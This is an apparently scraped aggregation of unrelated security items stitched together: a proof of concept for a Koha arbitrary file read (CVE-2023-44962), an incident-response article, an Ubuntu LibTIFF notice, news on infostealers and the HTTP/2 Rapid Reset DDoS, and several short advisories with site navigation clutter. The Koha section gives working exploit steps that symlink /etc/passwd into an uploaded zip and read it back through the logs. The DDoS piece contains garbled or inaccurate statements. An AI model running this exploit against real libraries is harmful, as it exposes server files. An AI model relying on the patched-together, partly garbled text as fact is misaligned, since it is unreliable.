File Upload vulnerability in Koha Library Software 23.05.04 and before allows a remote attacker to read arbitrary files via the upload-cover-image.pl component.

**CVE-2023-44962**

PoC for CVE-2023-44962

**Description**

This is a Arbitrary File Read Vulnerability in Koha Library Software v.23.05.04 and before which allows a remote attacker to read arbitrary files from koha server.

**Analysis**

Uploading archive files containing symbolic links in upload-cover-image.pl can leak some of the content of the linked files.

...
foreach my $dir (@directories) {
  my $file;
  if ( \-e "$dir/idlink.txt" ) {
      $file = "$dir/idlink.txt";
  }
  elsif ( \-e "$dir/datalink.txt" ) {
      $file = "$dir/datalink.txt";
  }
  else {
      next;
  }
  if ( open( my $fh, '<', $file ) ) {
      while ( my $line = <$fh\> ) {
          my $delim =
              ( $line =~ /\\t/ ) ? "\\t"
            : ( $line =~ /,/ )  ? ","
            :                     "";

          unless ( $delim eq "," || $delim eq "\\t" ) {
              warn
  "Unrecognized or missing field delimeter. Please verify that you are using either a ',' or a 'tab'";
              $error = 'DELERR';
          }
          else {
              ( $biblionumber, $filename ) = split $delim, $line, 2;
              $biblionumber =~
                s/\[\\"\\r\\n\]//g;    # remove offensive characters
              $filename =~ s/\[\\"\\r\\n\]//g;
              $filename =~ s/^\\s+//;
              $filename =~ s/\\s+$//;
              if (C4::Context\->preference("CataloguingLog")) {
                  logaction('CATALOGUING', 'MODIFY', $biblionumber, "biblio cover image: $filename");
              }
...

From the code, it can be seen that when the extracted file contains idlink. txt or datalink. txt , the file content will be read and divided according to, or \t . The latter part of the content will be assigned the value of $filename , and when the CataloguingLog attribute is enabled (default is enabled), the $filename will be recorded.

When accessing viewlog.pl, you can see the leaked file content

**PoC**

First, create an archive file:

ln -s /etc/passwd datalink.txt
zip --symlinks datalink.zip datalink.txt

Then access the following URL to write datalink.zip:

    http://koha_ip:intranet_port/cgi-bin/koha/tools/upload-cover-image.pl
    

The response code is 500.

Then access the following URL to read the file content:

    http://192.168.176.139:8081/cgi-bin/koha/tools/viewlog.pl

CVE-2023-44962: GitHub - ggb0n/CVE-2023-44962: PoC for CVE-2023-44962

The best incident-response plans cover contingencies and are fine-tuned in stress tests to ensure collaboration, remediation, and recovery efforts align.

Cyberattacks continue to rise, with a staggering 38% increase in global incidents last year. Attacks on digital identities are skyrocketing, cloud attacks are increasing, and ransomware continues to plague organizations in every industry. As the threat surface expands and the concept of a network "perimeter" becomes less and less defined, the issue is when a business will be attacked, not if it will be. That means businesses need to think not just in terms of prevention, but mitigation — and that starts with a plan.

**Uniting Competing Priorities**

There are a lot of competing priorities during a breach. The CFO will be concerned with the financial impact. The CMO and sales teams will be worried about reputation and customer messaging. The CTO, CIO, and other technology leaders will be focused on remediation, business continuity, and future prevention. Waiting until a breach happens to pressure-test the balance between those priorities isn't ideal. That means it's important to make a plan — several plans, in fact:

*   **Business continuity plan (IT/finance).** This should include specific instructions for recovery from a wide range of potential problems. Is a disaster-recovery process in place? Are there external providers or resources to contact? How can you get in touch with them? Are there backups that can be restored? Where are they, and who owns them? This plan should encompass all the necessary processes to ensure business continuity in the event of an incident.
*   **Crisis communications plan (marketing/PR).** It's critical to have a plan that defines who is in charge of messaging to internal stakeholders, customers, your board, and the public at large. Uncertainty can lead to confusion, which can make communication less effective and cause additional headaches. It's important to include detailed instructions regarding who the key decision makers are and which teams will have input into those decisions.
*   **Incident response plan (security).** This plan should detail the steps that security and technology teams need to take to address a potential incident. That means knowing how to identify, contain, and remediate a threat, but it also means knowing how to recover from an incident and apply its lessons in the future. One of the most important steps is to appoint an incident commander to lead the response efforts. This person supports the above plans and is responsible for decisions and communications to other parts of the organization. The CISO should provide oversight, but consult with other security leaders, including the incident commander, as well as third-party experts.

These plans cannot be made in isolation — they need to be aligned with one another, and leaders need to proactively collaborate. Otherwise, competing plans may wind up forcing people to work at cross purposes, creating unintentional conflict. This means it's important to not just draw up plans, but to stress-test them as well.

**Testing Your Plans: Tabletops**

Tabletop exercises are scenario-based breach simulations. They're usually run internally, though they often involve external consultants who can provide an objective perspective. They may come with a variety of different scenarios, and the exercise is run much like other, traditional tabletop games. An exercise might start with a technology problem and escalate through the PR response to a major breach. It might even get to a point where bankruptcy papers need to be drawn up. It sounds bleak, but knowing what to do in a worst-case scenario is important.

The goal here is to ensure that not only do the individual players know their roles during a security incident, but that they work well together. If there are places where the business recovery plan and incident recovery plan come into conflict, it's important to know that well ahead of time. If there are gaps in coverage where those plans are insufficient, they need to be refined and improved. It's especially important to test the places where communication and collaboration are required. If security controls failed to catch something, it's important to know _why_. Tabletop exercises help businesses assess their current standing while identifying opportunities to reduce risk and optimize their resources.

**People Are as Important as Technology**

Security breaches are stressful. There's often significant risk to the business, as well as people's livelihoods, so tensions can run high. People react to times of stress differently, and that's OK — but it's also why it's important to have a plan in place that takes emotion out of the equation by providing clear, step-by-step guidance. Security technology gets most of the attention, but it's important to remember that technology isn't the only — or even the most important — thing that needs to be tested. A breach affects the whole organization, from IT and security to finance and sales. When an incident occurs, it's important to know that everyone understands the role they play in achieving a positive outcome.

Addressing a Breach Starts With Getting Everyone on the Same Page

Ubuntu Security Notice 6428-1 - It was discovered that LibTIFF could be made to read out of bounds when processing certain malformed image files with the tiffcrop utility. If a user were tricked into opening a specially crafted image file, an attacker could possibly use this issue to cause tiffcrop to crash, resulting in a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6428-1  
October 11, 2023

tiff vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

LibTIFF could be made to crash if it opened a specially crafted file.

Software Description:  
- tiff: Tag Image File Format (TIFF) library

Details:

It was discovered that LibTIFF could be made to read out of bounds when  
processing certain malformed image files with the tiffcrop utility. If a  
user were tricked into opening a specially crafted image file, an attacker  
could possibly use this issue to cause tiffcrop to crash, resulting in a  
denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  libtiff-tools                   4.5.0-5ubuntu1.2  
  libtiff6                        4.5.0-5ubuntu1.2

Ubuntu 22.04 LTS:  
  libtiff-tools                   4.3.0-6ubuntu0.6  
  libtiff5                        4.3.0-6ubuntu0.6

Ubuntu 20.04 LTS:  
  libtiff-tools                   4.1.0+git191117-2ubuntu0.20.04.10  
  libtiff5                        4.1.0+git191117-2ubuntu0.20.04.10

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  libtiff-tools                   4.0.9-5ubuntu0.10+esm3  
  libtiff5                        4.0.9-5ubuntu0.10+esm3

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
  libtiff-tools                   4.0.6-1ubuntu0.8+esm13  
  libtiff5                        4.0.6-1ubuntu0.8+esm13

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
  libtiff-tools                   4.0.3-7ubuntu0.11+esm10  
  libtiff5                        4.0.3-7ubuntu0.11+esm10

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6428-1  
  CVE-2023-1916

Package Information:  
  https://launchpad.net/ubuntu/+source/tiff/4.5.0-5ubuntu1.2  
  https://launchpad.net/ubuntu/+source/tiff/4.3.0-6ubuntu0.6  
  https://launchpad.net/ubuntu/+source/tiff/4.1.0+git191117-2ubuntu0.20.04.10

Ubuntu Security Notice USN-6428-1

An SEO poisoning campaign is spreading the RecordBreaker/Raccoon Stealer and LummaC2 infostealers by attempting to confound software certificate checks.

Attackers are employing a new type of certificate abuse in an attempt to spread info-stealing malware, with the aim of collecting credentials and other sensitive data. In some instances, the goal is to steal cryptocurrency from Windows systems.

The campaign uses search engine optimization (SEO) poisoning to deliver search results featuring malicious pages promoting illegal software cracks and downloads. In the background, the pages deliver remote access Trojans (RATs) known as LummaC2, and RecordBreaker (aka Raccoon Stealer V2) researchers from South Korea-based AhnLab revealed in a blog post on Oct. 10.

Notably, the malware uses abnormal certificates featuring Subject Name and Issuer Name fields that have unusually long strings, which means they require specific tools or infrastructure to inspect the certificates and are not visible in Windows systems.  
Specifically, the signature strings include Arabic, Japanese, and other non-English languages, along with special characters and punctuation marks, diverging from the typical English character string structures, the researchers noted.

The latest sample currently in circulation consists of a string with a URL-encoded malicious script designed to download and execute PowerShell commands from a specific address, although the sample observed by researchers was unsuccessful in both downloading and execution.

"Similar samples of this kind have been consistently distributed with slight structural variations for over two months, suggesting a specific intent behind this action," researcher KDH of the AhnLab Security Emergency Response Center wrote in the post.  
In addition to its delivery through websites promoting illegal cracks and downloads — such as a legitimate .NET installer — the researchers also observed RaccoonStealer V2 being distributed through YouTube and other malware.

**Novel Type of Certificate Abuse**

While the certificates likely would fail any signature verification since they are incorrect, they could confuse and thus slip past some defenses. Indeed, certificate abuse is a common tactic used by threat actors, but they typically go about it in a different way.

"Malware often disguise themselves with normal certificates," KDH wrote. "That is, typically threat actors deliver malware that have legitimately signed certificates that can be verified, thus appearing to be authentic software that is then cleared to be successfully downloaded and executed."

That's the tactic that threat actors responsible for the prolific RedLine and Vidar stealer malwares were recently seen using, distributing ransomware payloads signed with Extended Validation (EV) certifications that allowed them to slip past email security, researchers from TrendMicro revealed in a recent blog post.

Like those stealers, LummaC2 and Raccoon Stealer are both familiar to security researchers and have various malicious functionality, but the primary focus is on stealing data from the systems they infect.  
"Upon infection, they can transmit sensitive user information such as browser-saved account credentials, documents, cryptocurrency wallet files, etc., to the threat actor, potentially resulting in severe secondary damages," according to the post.

"Furthermore, an additional piece of malware designated by the threat actor gets installed, enabling continuous malicious behaviors."  
While it's clear that the long-string certificate technique is being tinkered with and only partially successful thus far, users should be aware of the approach. The AhnLab researchers urged Windows users to take caution when downloading software online, especially from sites known for delivering illegal versions of popular applications. They also provided various indicators of compromise and a list of command-and-control domains associated with the delivery of both LummaC2 and Raccoon Stealer V2.

Data Thieves Test-Drive Unique Certificate Abuse Tactic

An Insecure Direct Object Reference (IDOR) vulnerability leads to events profiles access in Elenos ETG150 FM transmitter running on version 3.12.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-45396: Vulns/(IDOR) leads to events profiles access - Elenos.md at main · strik3r0x1/Vulns

By Deeba Ahmed
Google, Cloudflare, and AWS Disclosed Digital History’s Largest Ever DDoS Attack- Courtesy HTTP/2 Zero-day.
This is a post from HackRead.com Read the original post: Google, Cloudflare, and AWS Disclose Largest DDoS Attack in History

The largest DDoS attack on the Internet has occurred, following the exploitation of a new zero-day vulnerability by hackers.

*   **Google, Cloudflare, and AWS have confirmed that unknown adversaries exploited a new zero-day vulnerability called HTTP/2 Rapid Reset to launch digital history’s largest-ever record DDoS attack.**

*   **The attack peaked at 398 million RPS, which is 7 times higher than the previous largest DDoS attack recorded by Google.**

*   **AWS and Cloudflare had previously recorded DDoS attacks peaking at 200 million RPS.**

*   **The zero-day flaw lets adversaries send specially designed HTTP/2 requests to a target server, triggering an extensive response, which is further amplified by sending it to vulnerable IoT devices or misconfigured servers.**

*   **This novel technique is based on stream multiplexing.**

*   **In this case, threat actors sent amplified traffic to diverse targets, including financial entities, gaming corporations, and government agencies, causing significant damage to several of them.**

Three of the world’s leading tech firms, Google, Amazon Web Services (AWS), and Cloudflare, have jointly disclosed a new 0-day flaw exploited by unknown threat actors to launch the largest Distributed Denial of Service attack (DDoS attack) recorded to date.

Dubbed HTTP/2 Rapid Reset, the vulnerability lets attacker send specially designed HTTP/2 requests to their target server and trigger a large-scale response. They can further amplify this response by sending the same request to as many vulnerable IoT devices and misconfigured servers as they want. The vulnerability is tracked as CVE-2023-44487 and has been assigned a CVSS score of 7.5 out of 10, rated High Severity.

The largest ever DDoS attack resulting from HTTP/2 Rapid Reset’s exploitation peaked at 398 million requests per second (RPS), seven times higher than the previous largest attack recorded by Google.

Cloudflare and AWS had previously recorded DDoS attacks peaking at slightly over 200 million RPS. Cloudflare claims to have mitigated over 1,100 other attacks, peaking at 10 million RPS until August 2023, and 184 of them were greater than the company’s previously reported DDoS record of 71 million RPS. These are still startling revelations compared to last year when the highest recorded DDoS attack peaked at 46 million RPS.

A wide range of targets have been identified, including financial institutions, government agencies, and gaming companies. The attack caused massive damage to many of these targets, but most were able to mitigate them through filtering, rate limiting, and other techniques.

In its blog post, Google noted that this is a ‘hyper volumetric novel attack that relies on stream multiplexing. The attack exploits a weakness in the HTTP2 protocol, which lets clients identify the server a previous stream has to cancel by sending an RST\_STREAM frame. It is worth noting that the protocol doesn’t require client-server coordination for this cancellation, and the client performs it unilaterally.

The attack is dubbed Rapid Reset because when the RST\_STREAM frame is sent from one endpoint right after sending a request frame, the other endpoint starts working and rapidly resets the request. The request gets cancelled later, but the HTTP/2 connection remains open.

HTTP/1.1 and HTTP/2 request and response pattern (Source: Google)

This is a concerning issue because HTTP/2 protocol is a critical element of around 0% of all web apps and facilitates interaction between a browser and a website. It is responsible for determining the quality and speed of how visitors interact with websites.

Exploitation of such a critical protocol indicates that DDoS attack remains a potent and growing threat. Organizations must take necessary steps such as promptly patching systems, upgrading their security mechanisms, and using rate limiting and filtering or at least having an incident response plan to deal with DDoS attacks.

1.  Cloudflare thwarts largest reported HTTP DDoS attack
2.  10 Top DDoS Attack Protection and Mitigation Companies in 2023
3.  Tiny Mantis Botnet Can Launch More Powerful DDoS Attacks Than Mirai

Google, Cloudflare, and AWS Disclose Largest DDoS Attack in History

HCL Digital Experience is susceptible to cross site scripting (XSS). One subcomponent is vulnerable to reflected XSS. In reflected XSS, an attacker must induce a victim to click on a crafted URL from some delivery mechanism (email, other web site).


 

 Loading...

Skip to page contentSkip to chat

Skip to page contentSkip to chat

CVE-2023-37538: Knowledge Article View HCL - Customer Support

Authorization Bypass Through User-Controlled Key vulnerability in Apache ZooKeeper. If SASL Quorum Peer authentication is enabled in ZooKeeper (quorum.auth.enableSasl=true), the authorization is done by verifying that the instance part in SASL authentication ID is listed in zoo.cfg server list. The instance part in SASL auth ID is optional and if it's missing, like 'eve@EXAMPLE.COM', the authorization check will be skipped. As a result an arbitrary endpoint could join the cluster and begin propagating counterfeit changes to the leader, essentially giving it complete read-write access to the data tree. Quorum Peer authentication is not enabled by default.

Users are recommended to upgrade to version 3.9.1, 3.8.3, 3.7.2, which fixes the issue.

Alternately ensure the ensemble election/quorum communication is protected by a firewall as this will mitigate the issue.

See the documentation for more details on correct cluster administration.


1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2023-44981

**Authorization Bypass Through User-Controlled Key vulnerability in Apache ZooKeeper**

Moderate severity GitHub Reviewed Published Oct 11, 2023 to the GitHub Advisory Database • Updated Oct 11, 2023

**Package**

maven org.apache.zookeeper:zookeeper (Maven)

**Affected versions**

< 3.7.2

\>= 3.8.0, < 3.8.3

\>= 3.9.0, < 3.9.1

**Patched versions**

3.7.2

3.8.3

3.9.1

Authorization Bypass Through User-Controlled Key vulnerability in Apache ZooKeeper. If SASL Quorum Peer authentication is enabled in ZooKeeper (quorum.auth.enableSasl=true), the authorization is done by verifying that the instance part in SASL authentication ID is listed in zoo.cfg server list. The instance part in SASL auth ID is optional and if it's missing, like 'eve@EXAMPLE.COM', the authorization check will be skipped. As a result an arbitrary endpoint could join the cluster and begin propagating counterfeit changes to the leader, essentially giving it complete read-write access to the data tree. Quorum Peer authentication is not enabled by default.

Users are recommended to upgrade to version 3.9.1, 3.8.3, 3.7.2, which fixes the issue.

Alternately ensure the ensemble election/quorum communication is protected by a firewall as this will mitigate the issue.

See the documentation for more details on correct cluster administration.

**References**

*   https://nvd.nist.gov/vuln/detail/CVE-2023-44981
*   https://lists.apache.org/thread/wf0yrk84dg1942z1o74kd8nycg6pgm5b
*   http://www.openwall.com/lists/oss-security/2023/10/11/4

Published to the GitHub Advisory Database

Oct 11, 2023

Last updated

Oct 11, 2023

GHSA-7286-pgfv-vxvh: Authorization Bypass Through User-Controlled Key vulnerability in Apache ZooKeeper

Incorrect Authorization in GitHub repository tiann/kernelsu prior to v0.6.9.

CVE-2023-5521

Out-of-bounds Read in GitHub repository gpac/gpac prior to 2.2.2.

Tag

#git